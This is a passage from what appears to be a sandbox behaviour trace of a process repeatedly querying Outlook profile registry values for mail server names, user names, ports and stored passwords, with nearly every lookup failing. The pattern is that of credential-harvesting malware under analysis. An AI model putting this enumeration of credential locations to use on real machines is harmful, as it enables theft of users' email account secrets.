lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.171] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.171] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.171] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.172] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.172] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.172] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.173] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.173] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.173] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.174] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.174] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.174] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.175] RegCloseKey (hKey=0x95c) returned 0x0 [0249.175] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.175] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, 